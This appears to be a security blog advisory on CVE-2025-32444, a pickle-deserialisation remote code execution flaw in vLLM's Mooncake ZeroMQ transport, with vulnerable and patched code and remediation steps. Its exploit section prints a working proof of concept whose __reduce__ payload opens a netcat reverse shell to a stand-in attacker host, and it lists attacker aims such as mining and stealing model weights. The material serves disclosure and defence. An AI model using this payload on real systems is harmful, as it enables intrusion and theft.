CVE-2025-32444

Pickle Rick-Roll: Critical RCE in vLLM's Mooncake Integration

Alon Barad
Software Engineer

Jan 11, 2026·5 min read

Executive Summary (TL;DR)

vLLM developers used Python's `pickle` serialization over exposed ZeroMQ sockets for the Mooncake integration. Any attacker who can reach the port can send a malicious packet and immediately execute code as the user running vLLM (often root in containerized GPU deployments). CVSS 10.0.

A critical Remote Code Execution (RCE) vulnerability exists in vLLM's Mooncake distributed KV cache transfer mechanism. The flaw stems from the use of insecure Python pickling over unauthenticated ZeroMQ sockets bound to all network interfaces.

The Hook: Speed Kills

In the race for AI dominance, inference speed is king. vLLM has crowned itself the monarch of high-throughput LLM serving, and for good reason: it’s fast, efficient, and widely adopted. To make things even faster, vLLM integrated Mooncake, the KVCache-centric transfer architecture from Moonshot AI, to shuttle memory between GPUs like a relentless data conveyor belt.

But here's the thing about conveyor belts: if you don't put a guard rail around them, someone is going to lose an arm. In vLLM's case, the "arm" is the entire security model of the host machine.

The developers implemented a high-performance communication channel using ZeroMQ (ZMQ). It sounds standard enough until you peek under the hood and realize they prioritized convenience over sanity. They built a remote command execution feature; they just didn't realize it at the time.

The Flaw: The Forbidden Pickle

If you've been in security for more than a week, you know the cardinal rule of Python: Never unpickle untrusted data. It is not a suggestion; it is a law of nature. Yet, in 2025, we are still seeing this specific anti-pattern in critical infrastructure software.

The vulnerability lives in vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py. The developers used the pyzmq library to handle network communication, including its convenience methods send_pyobj() and recv_pyobj().

These functions are syntactic sugar: send_pyobj() serializes a Python object with pickle before sending it over the wire, and recv_pyobj() implicitly calls pickle.loads() on whatever raw bytes hit the socket. By default there is no authentication (ZeroMQ's NULL security mechanism), no signature verification, and no integrity check. It is a blind trust exercise with anyone who can reach the port.
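To make the "implicitly calls pickle.loads()" point concrete, here is a stdlib-only approximation of what the two helpers do to a frame. The `*_sketch` names are hypothetical stand-ins rather than pyzmq's source (the real methods also take flags and a pickle protocol argument), and the pointer and length values are made up to mirror the (src_ptr, length) metadata the Mooncake pipe sends.

```python
import pickle
import pickletools


def send_pyobj_sketch(obj: object) -> bytes:
    """Approximates send_pyobj(): the frame on the wire is just a pickle of obj."""
    return pickle.dumps(obj)


def recv_pyobj_sketch(frame: bytes) -> object:
    """Approximates recv_pyobj(): the frame goes straight into pickle.loads(), unchecked."""
    return pickle.loads(frame)


# The legitimate message is a (src_ptr, length) tuple; these values are invented.
frame = send_pyobj_sketch((0x7F00_0000_0000, 4096))

# The frame is a small program for pickle's virtual machine, not inert data.
opcodes = [op.name for op, _arg, _pos in pickletools.genops(frame)]
print(opcodes)

print(recv_pyobj_sketch(frame) == (0x7F00_0000_0000, 4096))  # True
```

Even the honest message is a sequence of opcodes that the receiver executes; nothing in recv_pyobj() restricts which opcodes a sender may use.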

The Code: The Smoking Gun

Let's look at the vulnerable code. It is almost tragically simple. The receiving side just waits for an object to arrive on its socket.

# vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py (Vulnerable)
 
def recv_bytes(self) -> bytes:
    """Receive bytes from the remote process."""
    # 🚩 The fatal flaw: implicitly unpickles data off the wire
    src_ptr, length = self.receiver_socket.recv_pyobj()
    
    dst_ptr = self.allocate_managed_buffer(length)
    self.transfer_sync(dst_ptr, src_ptr, length)
    # ... (remainder of the method elided in this excerpt)

Compounding this sin, the sockets were bound using a wildcard address:

# Binds to 0.0.0.0, exposing this to the world
self.sender_socket.bind(f"tcp://*:{p_rank_offset + 1}")
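The remedy for the wildcard is to bind only to the interface the peer actually uses. As a sketch, a hypothetical helper (not vLLM's patched code) that builds a ZeroMQ TCP endpoint and refuses the all-interfaces forms `*`, `0.0.0.0`, and `::` could look like this; the host and port in the usage line are invented.

```python
import ipaddress


def _is_unspecified_ip(host: str) -> bool:
    """True for 0.0.0.0 or ::, the 'any interface' addresses; False for hostnames."""
    try:
        return ipaddress.ip_address(host).is_unspecified
    except ValueError:
        return False  # not an IP literal (e.g. "prefill-node-0"), so not a wildcard


def zmq_bind_endpoint(host: str, port: int) -> str:
    """Build a ZeroMQ TCP bind endpoint for one specific interface.

    Hypothetical helper for illustration; it is not taken from vLLM's patch.
    """
    if host in ("*", "") or _is_unspecified_ip(host):
        raise ValueError(f"refusing to bind on all interfaces: {host!r}")
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    # IPv6 literals need brackets inside a ZeroMQ endpoint, e.g. tcp://[::1]:5555
    if ":" in host:
        return f"tcp://[{host}]:{port}"
    return f"tcp://{host}:{port}"


print(zmq_bind_endpoint("10.0.0.5", 14580))  # tcp://10.0.0.5:14580
```

With pyzmq, the resulting string would be handed to `socket.bind()`. Binding narrowly complements network-level filtering rather than replacing it.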

In the patched version (v0.8.5), the developers finally stripped out the magic. They replaced the object serialization with explicit binary packing using Python's struct module. This treats the input as raw numbers rather than executable objects.

# The Fix: Explicit binary unpacking
import struct
 
# Receiver side
data = self.receiver_socket.recv_multipart()
# "!Q" = one unsigned 64-bit integer in network byte order;
# struct.unpack raises struct.error unless the frame is exactly 8 bytes
src_ptr = struct.unpack("!Q", data[0])[0]
length = struct.unpack("!Q", data[1])[0]
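Both halves of that scheme fit in a few lines. This sketch assumes the sender mirrors the receiver with `struct.pack("!Q", ...)` over a two-frame multipart message; the function names are hypothetical, not vLLM's. The property that matters is that decoding can only ever yield two integers or an exception.

```python
import struct

U64 = struct.Struct("!Q")  # one unsigned 64-bit integer, network (big-endian) byte order


def pack_transfer_metadata(src_ptr: int, length: int) -> list[bytes]:
    """Sender side: encode pointer and length as two fixed-size 8-byte frames.

    U64.pack raises struct.error for negative or oversized values.
    """
    return [U64.pack(src_ptr), U64.pack(length)]


def unpack_transfer_metadata(frames: list[bytes]) -> tuple[int, int]:
    """Receiver side: decode exactly two 8-byte frames, rejecting anything else."""
    if len(frames) != 2:
        raise ValueError(f"expected 2 frames, got {len(frames)}")
    (src_ptr,) = U64.unpack(frames[0])  # struct.error unless exactly 8 bytes
    (length,) = U64.unpack(frames[1])
    return src_ptr, length


frames = pack_transfer_metadata(0x7F00_0000_1000, 4096)
print(unpack_transfer_metadata(frames) == (0x7F00_0000_1000, 4096))  # True
```

With pyzmq, these would pair with `socket.send_multipart(...)` and `socket.recv_multipart()`. Decoding no longer executes anything, though the integers still arrive from the network, which is one reason the patch also narrows where the socket listens.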

The Exploit: Weaponizing Python

Exploiting this is trivial. We don't need buffer overflows or complex heap feng shui. We just need to ask Python nicely to run a shell command.

Python's pickle protocol lets objects define how they should be reconstructed via the __reduce__ method. If we define a class whose __reduce__ returns a callable (like os.system) together with a tuple of arguments (like a reverse shell command), pickle records that call instead of the object, and the victim's pickle.loads() executes it the moment our packet is deserialized.
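A harmless variant makes the mechanism visible without a shell. In this sketch `__reduce__` returns the built-in `divmod` instead of `os.system` (the class name `Harmless` is made up for illustration). It shows that `pickle.loads()` calls whatever callable the stream names, and that the receiver never needs the attacker's class at all.

```python
import pickle
import pickletools


class Harmless:
    """Stands in for an attacker class, but reduces to divmod(17, 5)."""

    def __reduce__(self):
        # (callable, args): pickle records "call builtins.divmod with (17, 5)"
        return (divmod, (17, 5))


blob = pickle.dumps(Harmless())

# The stream names the callable, not the class, so the receiver needs no Harmless.
opcodes = [op.name for op, _arg, _pos in pickletools.genops(blob)]
print("REDUCE" in opcodes)  # True: the opcode that performs the call
print(b"Harmless" in blob)  # False

# Deserializing *calls* divmod; its return value replaces the object entirely.
result = pickle.loads(blob)
print(result)  # (3, 2)

# Mirrors the vulnerable receiver: the unpack runs only after the call already happened.
src_ptr, length = result
```

The last line mirrors the vulnerable recv_bytes(): by the time `src_ptr, length = ...` runs, the callable has already executed, so no check on the unpacked values can help.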

Here is what a researcher's Proof of Concept looks like:

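import os
import pickle

import zmq

# 1. Craft the bomb: pickle stores the call that __reduce__ returns
class RCE:
    def __reduce__(self):
        # The classic reverse shell (needs a netcat build that supports -e)
        cmd = 'nc -e /bin/sh attacker.com 1337'
        return (os.system, (cmd,))

# 2. Connect to the vulnerable vLLM instance
context = zmq.Context()
# ZeroMQ refuses mismatched socket types: PAIR only talks to PAIR, so a real
# client must use a type compatible with the target socket (e.g. PUSH for PULL)
socket = context.socket(zmq.PAIR)
# "port" is a placeholder; the target port usually follows a predictable offset pattern
socket.connect("tcp://target-vllm-host:port")

# 3. Fire and forget: send() only queues the message; execution happens
# when the victim calls recv_pyobj() on it
payload = pickle.dumps(RCE())
socket.send(payload)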

Once the payload reaches the server and the vLLM process passes it to recv_pyobj(), the command executes as the user running the model (often root in containerized GPU environments).

The Impact: Your GPUs Are Now Mine

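Why is this a CVSS 10.0? The vector explains the score: the flaw is reachable over the network, easy to exploit, needs no privileges or user interaction, fully compromises confidentiality, integrity, and availability, and changes scope beyond the vulnerable component. It doesn't help that AI infrastructure is high-value target territory.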

  1. Compute Theft: An attacker can immediately kill your inference jobs and repurpose your H100 cluster for crypto mining or password cracking.
  2. IP Theft: They have shell access. They can exfiltrate the proprietary model weights you spent millions training.
  3. Data Exfiltration: If you are using RAG (Retrieval-Augmented Generation), the attacker potentially has access to the vector database credentials and the private documents being processed.

Since these services often run inside Docker containers with mounted volumes and direct access to GPU devices, escaping to the host or pivoting to other cloud resources is the next logical step for an intruder.

The Fix: Closing the Door

If you are running vLLM with Mooncake enabled, you are sitting on a ticking time bomb.

Immediate Actions:

  1. Update: Upgrade to vLLM 0.8.5 or later immediately. The patch moves from pickle to struct and restricts socket binding to specific hosts.
  2. Firewall: Why is your inference engine listening on 0.0.0.0? Use iptables or cloud security groups to allow these ports only from strictly trusted IPs.
  3. Disable Mooncake: If you can't patch, disable the Mooncake integration via configuration. It's better to be slightly slower than completely owned.
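To see whether a given environment falls in the affected range (>= 0.6.5, < 0.8.5, per the affected-versions table), a quick check could look like the following. It is a sketch: `release_tuple()` is a simplified, hypothetical parser that ignores pre-release and local tags (`packaging.version` is the robust choice), and, as noted above, the exposure only matters for deployments running Mooncake.

```python
import re
from importlib import metadata

AFFECTED_FROM = (0, 6, 5)  # ">= 0.6.5" from the affected-versions table
FIXED_IN = (0, 8, 5)       # "< 0.8.5"; 0.8.5 is the first fixed release


def release_tuple(version: str) -> tuple[int, ...]:
    """Numeric release part only, e.g. '0.8.5.dev12+gabc' -> (0, 8, 5).

    Simplified on purpose: pre-release markers such as 'rc1' are ignored.
    """
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_affected(version: str) -> bool:
    return AFFECTED_FROM <= release_tuple(version) < FIXED_IN


def check_installed() -> str:
    try:
        installed = metadata.version("vllm")
    except metadata.PackageNotFoundError:
        return "vllm is not installed"
    if is_affected(installed):
        return f"vllm {installed}: in the affected range, upgrade to 0.8.5 or later"
    return f"vllm {installed}: outside the affected range"


if __name__ == "__main__":
    print(check_installed())
```

Tuple comparison does the range check: `(0, 8)` sorts below `(0, 8, 5)`, matching the intuition that 0.8 means 0.8.0.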


Technical Appendix

CVSS Score: 10.0 / 10
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Probability: 2.54% (top 15% of CVEs by EPSS score)
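The 10.0 can be reproduced from the vector string with the CVSS v3.1 base-score equations published by FIRST. This is a minimal sketch covering base metrics only (no temporal or environmental metrics); the weights are the specification's, while the function names are illustrative.

```python
import math

# CVSS v3.1 base-metric weights from the FIRST specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value, float-safe."""
    int_input = round(value * 100_000)
    if int_input % 10_000 == 0:
        return int_input / 100_000.0
    return (math.floor(int_input / 10_000) + 1) / 10.0


def base_score(vector: str) -> float:
    prefix, *pairs = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError(f"not a CVSS v3.1 vector: {vector!r}")
    m = dict(pair.split(":") for pair in pairs)
    changed = m["S"] == "C"

    # Impact sub-score from the confidentiality/integrity/availability weights.
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]

    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"))  # 10.0
```

Scope:Changed is what pushes this past the familiar 9.8: the 1.08 multiplier lifts the raw sum above 10, and the formula caps it there.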

Affected Systems

vLLM Inference Engine
Mooncake KV Transfer System

Affected Versions Detail

Product: vLLM (vllm-project)
Affected Versions: >= 0.6.5, < 0.8.5
Fixed Version: 0.8.5

CWE: CWE-502 (Deserialization of Untrusted Data)
CVSS v3.1: 10.0 (Critical)
Attack Vector: Network (Remote)
Library: pyzmq (recv_pyobj)
Impact: Remote Code Execution (Root/User)
Protocol: ZeroMQ (TCP)

CWE-502: Deserialization of Untrusted Data

The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.

Vulnerability Timeline

2025-04-25: Fix committed to GitHub
2025-04-29: GHSA advisory published
2025-04-30: CVE assigned
